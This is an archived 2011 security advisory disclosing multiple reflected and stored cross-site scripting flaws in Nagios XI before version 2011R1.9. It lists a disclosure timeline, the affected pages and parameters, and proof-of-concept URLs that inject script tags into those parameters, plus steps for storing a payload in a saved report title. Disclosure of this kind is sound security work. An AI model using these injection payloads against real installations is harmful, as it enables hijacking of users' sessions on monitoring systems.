Nagios XI Cross Site Scripting

2011-12-15T00:00:00
ID PACKETSTORM:107872
Type packetstorm
Reporter 0a2940
Modified 2011-12-15T00:00:00

Description

                                        
                                            `================  
Cross-Site Scripting vulnerabilities in Nagios XI < 2011R1.9  
  
Author: 0a29406d9794e4f9b30b3c5d6702c708  
  
twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940  
================  
Description:  
================  
  
Multiple XSS vulnerabilities exist within Nagios XI. It is entirely likely this  
list is non-exhaustive, due to the sheer number of issues. Of particular note  
is XSS on the login page, and the ability to pass XSS through the login page,  
using the redirect parameter, e.g.  
http://site/nagiosxi/login.php?redirect=nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>  
  
Tested against 2011R1.8, dated October 28, 2011. Fixes detailed in  
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT (2011R1.9  
- 12/07/2011)  
  
================  
Timeline:  
================  
  
16 November 2011 - Reported to Nagios Enterprises  
16 November 2011 - Acknowledged  
13 December 2011 - Nagios XI 2011R1.9 released  
16 December 2011 - Nagios Enterprises report fixed  
16 December 2011 - Public disclosure  
  
================  
Details:  
================  
  
Reflected XSS  
-----  
  
Page: /nagiosxi/login.php  
Variables: -  
PoCs: http://site/nagiosxi/login.php/";alert('0a29');"  
Details: The URL is copied into JavaScript variable 'backend_url' in an unsafe  
manner  
Also affects:  
/nagiosxi/about/index.php  
/nagiosxi/about/index.php  
/nagiosxi/about/main.php  
/nagiosxi/account/main.php  
/nagiosxi/account/notifymethods.php  
/nagiosxi/account/notifymsgs.php  
/nagiosxi/account/notifyprefs.php  
/nagiosxi/account/testnotification.php  
/nagiosxi/help/index.php  
/nagiosxi/help/main.php  
/nagiosxi/includes/components/alertstream/go.php  
/nagiosxi/includes/components/alertstream/index.php  
/nagiosxi/includes/components/hypermap_replay/index.php  
/nagiosxi/includes/components/massacknowledge/mass_ack.php  
/nagiosxi/includes/components/xicore/recurringdowntime.php/  
/nagiosxi/includes/components/xicore/status.php  
/nagiosxi/includes/components/xicore/tac.php  
/nagiosxi/reports/alertheatmap.php  
/nagiosxi/reports/availability.php  
/nagiosxi/reports/eventlog.php  
/nagiosxi/reports/histogram.php  
/nagiosxi/reports/index.php  
/nagiosxi/reports/myreports.php  
/nagiosxi/reports/nagioscorereports.php  
/nagiosxi/reports/notifications.php  
/nagiosxi/reports/statehistory.php  
/nagiosxi/reports/topalertproducers.php  
/nagiosxi/views/index.php  
/nagiosxi/views/main.php  
  
Page: /nagiosxi/account/  
Variables: xiwindow  
PoCs: http://site/nagiosxi/account/?xiwindow="></iframe><script>alert('0a29')</script>  
  
Page: /nagiosxi/includes/components/massacknowledge/mass_ack.php  
Variables: -  
PoCs: http://site/nagiosxi/includes/components/massacknowledge/mass_ack.php/'><script>alert("0a29")</script>  
  
Page: /nagiosxi/includes/components/xicore/status.php  
Variables: hostgroup, style  
PoCs: http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup='><script>alert("0a29")</script>  
http://site/nagiosxi/includes/components/xicore/status.php?show=hostgroups&hostgroup=all&style=><script>alert("0a29")</script>  
  
Page: /nagiosxi/includes/components/xicore/recurringdowntime.php  
Variables: -  
PoCs: http://site/nagiosxi/includes/components/xicore/recurringdowntime.php/';}}alert('0a29')</script>  
  
  
Page: /nagiosxi/reports/alertheatmap.php  
Variables: height, host, service, width  
PoCs: http://site/nagiosxi/reports/alertheatmap.php?height="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/alertheatmap.php?host="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/alertheatmap.php?service="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/alertheatmap.php?width="><script>alert("0a29")</script>  
  
Page: /nagiosxi/reports/histogram.php  
Variable: service  
PoCs: http://site/nagiosxi/reports/histogram.php?service="><script>alert("0a29")</script>  
  
Page: /nagiosxi/reports/notifications.php  
Variables: host, service  
PoCs: http://site/nagiosxi/reports/notifications.php?host="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/notifications.php?service="><script>alert("0a29")</script>  
  
Page: /nagiosxi/reports/statehistory.php  
Variables: host, service  
PoCs: http://site/nagiosxi/reports/statehistory.php?host="><script>alert("0a29")</script>  
http://site/nagiosxi/reports/statehistory.php?service="><script>alert("0a29")</script>  
  
  
Stored XSS  
-----  
  
Page: /nagiosxi/reports/myreports.php  
Variable: title  
Details: It is possible to store XSS within 'My Reports', however it  
is believed this  
is only viewable by the logged-in user.  
1) View a report and save it, e.g.  
http://site/nagiosxi/reports/myreports.php?add=1&title=Availability+Summary&url=%2Fnagiosxi%2Freports%2Favailability.php&meta_s=a%3A0%3A%7B%7D  
2) Name the report with XSS, e.g. "><script>alert("0a29")</script>  
`